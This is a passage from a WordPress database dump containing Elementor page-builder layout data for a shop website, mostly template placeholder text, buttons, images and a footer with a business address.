here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"4958df1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"48ae73c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4fbe7c9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7f118ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"1094c04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"23f1949\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"564a60c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4f7aa47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6b7196e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"db3e45f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"c6757ae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f80f2bc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"fe9d098\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1279df7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"61ee343\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1189e91\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#E2E4E28C\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#FF8236\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b0a2b03\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"27202c7\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#F0F0F0\"},\"elements\":[{\"id\":\"3c307c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"d2c5d23\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false},{\"id\":\"4cc038b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f7f100a\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false},{\"id\":\"f270d26\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"802fcc9\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false},{\"id\":\"53f4aeb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f85352a\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"204ce8a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ef00601\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0d3e7a9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/strong><\\/h4>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8712,1512,'_elementor_page_assets','a:0:{}'),(8714,1513,'_elementor_edit_mode','builder'),(8715,1513,'_elementor_template_type','wp-page'),(8716,1513,'_elementor_version','3.7.7'),(8717,1513,'_wp_page_template','elementor_canvas'),(8718,1513,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\",\"_margin\":{\"unit\":\"px\",\"top\":\"-24\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"da958fb\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#DDD6D636\"},\"elements\":[{\"id\":\"708fcb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"52f19eb\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"Accordion #1\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c1c0cb1\"},{\"tab_title\":\"Accordion #2\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c81da6b\"},{\"_id\":\"de1d949\",\"tab_title\":\"Accordion Title\"},{\"_id\":\"cb17b05\",\"tab_title\":\"Accordion Title\"}],\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"faq_schema\":\"yes\",\"border_width\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_element_width\":\"inherit\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e357abe\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b3b6eb2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ae4d7ac\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"20a83dc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bc85492\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"a53f4e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"88d8734\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"006d2d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"fb06b27\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6df56a4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"3427821\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"981ddd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"769b005\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ef95559\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"4c2bf26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"550a2fe\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"d29feb9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"c8fdf6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5bf1ad\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"9453712\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"e15dab4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c1b003\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"71c81df\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f37c86d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f839c1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0d6b040\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e374c42\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"27bc579\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e6bf144\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"4958df1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"48ae73c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4fbe7c9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7f118ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"1094c04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"23f1949\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"564a60c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4f7aa47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6b7196e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"db3e45f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"c6757ae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f80f2bc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"fe9d098\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1279df7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"61ee343\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1189e91\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#E2E4E28C\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into 